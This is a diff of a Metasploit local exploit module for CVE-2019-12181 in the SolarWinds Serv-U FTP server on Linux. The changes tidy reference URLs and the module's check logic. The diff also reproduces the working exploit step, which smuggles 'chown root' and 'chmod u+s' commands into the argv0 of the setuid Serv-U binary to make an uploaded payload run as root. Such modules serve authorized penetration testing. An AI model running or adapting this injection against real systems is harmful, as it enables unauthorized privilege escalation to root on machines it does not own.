@@ -43,9 +43,9 @@ class MetasploitModule < Msf::Exploit::Local
           ['PACKETSTORM', '153333'],
           ['URL', 'https://github.com/guywhataguy/CVE-2019-12181'],
           ['URL', 'https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181'],
-          ['URL', 'https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html'],
+          ['URL', 'http://web.archive.org/web/20200803153621/https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html'],
           ['URL', 'https://documentation.solarwinds.com/en/success_center/servu/Content/Release_Notes/Servu_15-1-7_release_notes.htm'],
-          ['URL', 'https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-Potential-elevation-of-privileges-on-Linux-systems']
+          ['URL', 'http://web.archive.org/web/20250208173448/https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-Potential-elevation-of-privileges-on-Linux-systems']
         ],
         'Platform' => ['linux'],
         'Arch' => [
@@ -67,7 +67,8 @@ class MetasploitModule < Msf::Exploit::Local
         },
         'Notes' => {
           'Reliability' => [ REPEATABLE_SESSION ],
-          'Stability' => [ CRASH_SAFE ]
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
         },
         'DefaultTarget' => 0,
         'Compat' => {
@@ -108,32 +109,26 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    unless command_exists? 'bash'
-      vprint_error 'bash shell is not available'
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe('bash shell is not available') unless command_exists? 'bash'
+
     vprint_good 'bash shell is available'
 
-    unless cmd_exec("test -x '#{servu_path}' && echo true").include? 'true'
-      vprint_error "#{servu_path} is not executable"
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe("#{servu_path} file not found") unless file? servu_path
+
+    return CheckCode::Safe("#{servu_path} is not executable") unless executable?(servu_path)
+
     vprint_good "#{servu_path} is executable"
 
-    unless setuid? servu_path
-      vprint_error "#{servu_path} is not setuid"
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe("#{servu_path} is not setuid") unless setuid? servu_path
+
     vprint_good "#{servu_path} is setuid"
 
     CheckCode::Detected
   end
 
   def exploit
-    if is_root?
-      unless datastore['ForceExploit']
-        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
-      end
+    if !datastore['ForceExploit'] && is_root?
+      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
     end
 
     unless writable? base_dir
@@ -148,8 +143,8 @@ class MetasploitModule < Msf::Exploit::Local
     @payload_path = "#{base_dir}/#{payload_name}"
     upload_and_chmodx @payload_path, generate_payload_exe
 
-    argv0 = %Q{\\";chown root #{@payload_path};chmod u+s #{@payload_path};chmod +x #{@payload_path}\\"}
-    cmd = %Q{bash -c 'exec -a "#{argv0}" #{servu_path} -prepareinstallation'}
+    argv0 = %(\\";chown root #{@payload_path};chmod u+s #{@payload_path};chmod +x #{@payload_path}\\")
+    cmd = %(bash -c 'exec -a "#{argv0}" #{servu_path} -prepareinstallation')
     vprint_status "Executing command: #{cmd}"
     cmd_exec cmd
 
